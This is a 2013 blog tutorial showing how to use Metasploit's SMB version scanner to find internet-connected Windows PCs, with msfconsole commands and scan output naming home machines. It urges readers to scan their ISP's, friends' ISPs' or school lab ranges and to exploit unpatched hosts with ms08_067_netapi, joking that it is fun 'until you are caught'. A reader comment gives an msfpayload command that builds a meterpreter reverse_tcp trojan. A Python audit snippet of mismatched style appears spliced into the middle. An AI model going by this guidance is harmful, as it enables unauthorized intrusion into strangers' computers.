Find online Windows machines using Metasploit

By | April 17, 2013

In this post I am going to show you how to discover Windows machines online. These Windows machines belong to desktop users connected to the internet. Many Windows versions are known to have vulnerabilities that can be exploited with Metasploit by just using the IP address of the system. So the first step would be to find such machines, if any.

SMB version scanner

Metasploit has an auxiliary scanner module for scanning the SMB service version on a range of IP addresses. The SMB service runs on port number 445. The exact path to the scanner inside msfconsole is auxiliary/scanner/smb/smb_version.

The first step would be to set the target IP addresses to scan. The best way to find a range of IP addresses to scan is your own IP address range. Just like you are connected to the internet through your ISP, lots of other users are connected too. Let's say I find out my public IP address to be then I can choose a range of
That range will scan 255 IP addresses in all.

Let's try this with Metasploit. Start msfconsole. I am using BackTrack, so the output might look different from your console if it's Windows or something else.

msf > use auxiliary/scanner/smb/smb_version 
msf  auxiliary(smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

First select the SMB version scanner, then display the options it needs to scan. The only required option is RHOSTS, which is the IP range to scan, so we set it to the IP address range we chose above.

msf  auxiliary(smb_version) > set RHOSTS

We also set a higher value for THREADS, like 10, so that it can scan faster.

msf  auxiliary(smb_version) > set THREADS 10

All options are set; now type run and hit Enter. It will start showing online Windows machines with the version number, build, etc.

msf  auxiliary(smb_version) > run

[*] is running Windows 7 Ultimate (Build 7600) (language: Unknown) (name:MANISH-PC) (domain:WORKGROUP)
[*] is running Windows 7 Ultimate (Build 7600) (language: Unknown) (name:RAJESH-PC) (domain:WORKGROUP)
[*] is running Windows 7 Home Premium (Build 7601) (language: Unknown) (name:MININT-VCRO6TK) (domain:WORKGROUP)

If you are lucky enough to find an unpatched Windows XP SP2 (or lesser) machine then you might be able to launch the famous ms08_067_netapi exploit and gain control of the system using meterpreter or VNC. That is going to be real fun until you are caught! If you are running out of hacking ideas, then let me tell you that you can try this on your ISP's IP range, your friend's ISP's IP range, your school computer lab and so on.

Note that these are machines that are directly connected to the internet, because Metasploit could access port number 445 and extract information from it. If a machine is connected via an internet router then it won't show up here, since the router would be the device online in that case.
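For an audit of your own address range, the scanner output can be parsed into a list of hosts whose port 445 answers from outside, which is the condition the note above describes. This is an added example, not code from the original post or from Metasploit; the sample lines, the leading host address on each line (the output printed above has none) and the `approved` list are constructed assumptions.

```python
import re

# Constructed sample output in the smb_version format shown in the post.
# The leading address (documentation range 192.0.2.0/24) is an assumption.
SAMPLE_OUTPUT = """\
[*] 192.0.2.14:445 is running Windows 7 Ultimate (Build 7600) (language: Unknown) (name:DESK-A) (domain:WORKGROUP)
[*] 192.0.2.27:445 is running Windows 7 Home Premium (Build 7601) (language: Unknown) (name:DESK-B) (domain:WORKGROUP)
[*] 192.0.2.40:445 is running Windows XP Service Pack 2 (language: English) (name:LAB-03) (domain:LAB)
[*] Scanned 026 of 256 hosts (010% complete)
[*] Auxiliary module execution completed
"""

LINE_RE = re.compile(
    r"^\[\*\]\s+(?P<host>\d{1,3}(?:\.\d{1,3}){3})(?::(?P<port>\d+))?"
    r"\s+is running\s+(?P<os>.+?)"
    r"(?:\s+\(Build (?P<build>\d+)\))?"        # build is absent on some lines
    r"\s+\(language:\s*(?P<language>[^)]*)\)"
    r"\s+\(name:(?P<name>[^)]*)\)"
    r"\s+\(domain:(?P<domain>[^)]*)\)\s*$"
)


def parse_smb_version(text):
    """Return one dict per host line; progress and status lines are skipped."""
    hosts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rec = m.groupdict()
            rec["build"] = int(rec["build"]) if rec["build"] else None
            hosts.append(rec)
    return hosts


def unexpected_exposure(hosts, approved):
    """Hosts answering on SMB that are not on the approved list, in address order."""
    flagged = [h for h in hosts if h["host"] not in approved]
    return sorted(flagged, key=lambda h: tuple(int(p) for p in h["host"].split(".")))


if __name__ == "__main__":
    approved = {"192.0.2.27"}  # hypothetical: hosts that are meant to expose SMB
    for h in unexpected_exposure(parse_smb_version(SAMPLE_OUTPUT), approved):
        print(f'{h["host"]}  {h["name"]:<8} {h["os"]} (build {h["build"]}): '
              "port 445 reachable, filter it at the edge")
```

Every host the parser returns had port 445 reachable from the scanning vantage point and disclosed its OS build, machine name and domain without authentication.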

So we saw how the auxiliary modules give Metasploit the power to scan as well as exploit. There are many other useful scanners that we are going to talk about in upcoming posts.

Last Updated On : 17th April 2013

One thought on “Find online windows machines using metasploit”

  1. BEN

    error message when creating trojan payload

    msf > msfpayload windows/meterpreter/reverse_tcp LHOST= X >
    [*] exec: msfpayload windows/meterpreter/reverse_tcp LHOST=
    X > /home/ben/ExploitMeta.exe

    `block in replace_bin_path’: can’t find executable msfpayload
    from /var/lib/gems/2.1.0/bin/msfpayload:23:in `’
